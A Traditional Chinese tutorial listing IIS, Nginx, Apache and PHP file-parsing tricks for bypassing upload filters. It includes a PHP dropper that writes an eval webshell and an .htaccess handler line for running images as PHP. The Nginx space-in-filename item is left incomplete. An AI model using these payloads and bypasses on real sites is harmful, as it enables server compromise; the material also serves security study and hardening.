一、IIS6.0解析漏洞

iis6.0解析漏洞我覺著是最經典的解析漏洞了吧，現在一些小站這種漏洞還是仍然存在的

1.目錄解析

       1.asp/1.jpg   可利用此突破上傳，iis6.0會將1.jpg解析成1.asp

2.檔名解析

       1.asp;.jpg   iis6.0從左向右解析，碰到;停止解析，把後面的jpg截斷

3.特殊格式

       1.asa     1.cer       1.cdx

這種主要是由於在 IIS 預設配置中，這幾個字尾預設由 asp.dll 來解析，所以執行許可權和 .asp 一模一樣

二、IIS7.0/Nginx < 8.03 畸形解析漏洞

在預設Fast-CGI開啟狀況下,上傳一個名字為test.jpg，內容為

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

然後訪問..../...../test.jpg 則會在當前目錄下生成shell.php

三、Nginx 其他解析漏洞

1.在Fast-CGI關閉的情況下，Nginx <=0.8.37 依然存在解析漏洞

在圖片中嵌入 PHP 程式碼然後通過訪問 xxx.jpg%00.php 就會執行裡面的 PHP 程式碼

2.Nginx/1.0.15中進行。首先準備一張圖片，命名為“test.html ”，注意，檔名含有空格。然後在瀏覽器中訪問該檔案，會得到一個404，因為瀏覽器自動將空格編碼為%20，伺服器中不存在檔案“test.html%20”。

四、Apache解析漏洞

Apache 是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷.比如 test.php.owf.rar ".owf"和".rar" 這兩種字尾是apache不可識別解析,apache就會把test.php.owf.rar解析成php.

五、其他解析漏洞

1.在windows環境下，xx.jpg[空格] 或xx.jpg. 這兩類檔案都是不允許存在的，若這樣命名，windows會預設除去空格或點,黑客可以通過抓包，在檔名後加一個空格或者點繞過黑名單.若上傳成功，空格和點都會被windows自動消除,這樣也可以getshell。

2.如果在Apache中.htaccess可被執行，且可被上傳.那可以嘗試在.htaccess中寫入:

SetHandler application/x-httpd-php

然後再上傳shell.jpg的木馬, 這樣shell.jpg就可解析為php檔案。

3.PHP CGI解析漏洞

當php的配置檔案中的選項cgi.fix_pathinfo = 1開啟時，當訪問http://www.xxx.com/x.txt/x.php
時，若x.php不存在，則PHP會遞歸向前解析，將x.txt當作php指令碼來解析